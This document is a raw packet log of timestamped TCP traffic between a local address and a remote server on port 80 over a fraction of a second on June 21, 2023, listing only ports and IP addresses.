Jun 21, 2023 04:27:45.498171091 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498197079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498210907 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498225927 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498255014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498270035 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498285055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498311043 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498337984 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498346090 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498367071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498398066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498409033 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498428106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498456001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498471022 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498486042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498490095 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498514891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498543978 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498573065 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498583078 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498604059 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498761892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498794079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498822927 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498847961 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498852968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498882055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498905897 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498912096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498939991 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498970032 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498985052 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498996973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499010086 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499026060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499053001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499072075 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499083996 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499114990 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499141932 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499150991 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499169111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499181986 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499197960 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499227047 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499257088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499268055 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499284029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499294996 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499311924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499341011 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499371052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499385118 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499399900 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499409914 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499429941 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499458075 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499485970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499511003 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499515057 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499526978 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499727964 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499756098 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499785900 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499809980 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499815941 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499840021 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499845982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499874115 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499890089 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.499903917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499934912 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499963999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499989033 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.499999046 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500015974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500026941 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500045061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500076056 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500104904 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500112057 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500130892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500133991 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500161886 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500190973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500215054 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500220060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500235081 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500250101 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500297070 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500298023 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500327110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500356913 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500386000 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500387907 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500412941 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500439882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500456095 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500471115 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500474930 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500499010 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500549078 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500648975 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500678062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500706911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500734091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500735044 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500761986 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500792027 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500806093 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500823021 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500838995 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500850916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500878096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500901937 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500909090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500937939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500967026 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.500988007 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.500993013 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501014948 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501020908 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501051903 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501060009 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501080990 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501108885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501133919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501152992 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501163006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501174927 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501192093 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501219988 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501230001 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501250029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501279116 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501296997 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501410961 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501503944 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501533985 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501555920 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501562119 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501591921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501619101 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501646996 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501662016 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501662016 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501677036 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501704931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501730919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501734972 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501759052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501801014 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501812935 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501837969 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501879930 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501907110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501929045 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501946926 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.501951933 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501975060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.501996994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502019882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502031088 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502043009 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502063990 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502064943 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502085924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502104044 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502118111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502140045 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502161026 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502161980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502177954 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502185106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502207041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502229929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502258062 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502274990 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502377987 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502399921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502422094 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502459049 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502460957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502482891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502505064 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502522945 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502531052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502547979 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502552986 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502574921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502594948 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502616882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502619982 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502639055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502641916 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502660990 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502681017 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502687931 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502705097 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502715111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502748013 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502749920 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502769947 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502790928 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502800941 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502814054 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502835035 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502856970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502878904 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502893925 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502914906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502923965 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502924919 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502935886 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502957106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502969027 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502969027 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.502978086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.502989054 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503010988 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503391981 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503401995 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503413916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503437996 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503459930 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503472090 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503482103 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503494978 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503504038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503523111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503523111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503526926 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503549099 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503570080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503573895 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503593922 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503616095 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503638029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503659010 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503667116 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503667116 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503681898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503698111 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503709078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503724098 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503741026 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503752947 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503772974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503803015 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503823996 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503823996 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503835917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503861904 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503885984 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503890038 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503907919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503930092 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503931999 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.503952980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.503973961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504000902 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504024982 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504028082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504067898 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504105091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504127026 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504251957 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504358053 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504369020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504405022 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504436970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504465103 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504467010 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504497051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504519939 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504559040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504590034 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504617929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504621029 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504648924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504679918 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504694939 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504708052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504728079 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504730940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504753113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504776001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504796982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504801035 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504817963 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504822016 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504852057 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504858971 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504878998 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504904032 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504930973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504950047 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504959106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.504966021 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.504987001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505013943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505058050 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505172968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505233049 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505261898 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505285978 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505295038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505322933 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505346060 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505352974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505384922 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505397081 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505415916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505426884 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505448103 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505471945 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505495071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505517006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505522013 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505543947 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505546093 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505575895 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505604982 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505616903 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505635977 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505645037 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505669117 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505700111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505712032 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.505731106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.505760908 CEST	80	49709	188.114.96.7	192.168.2.3
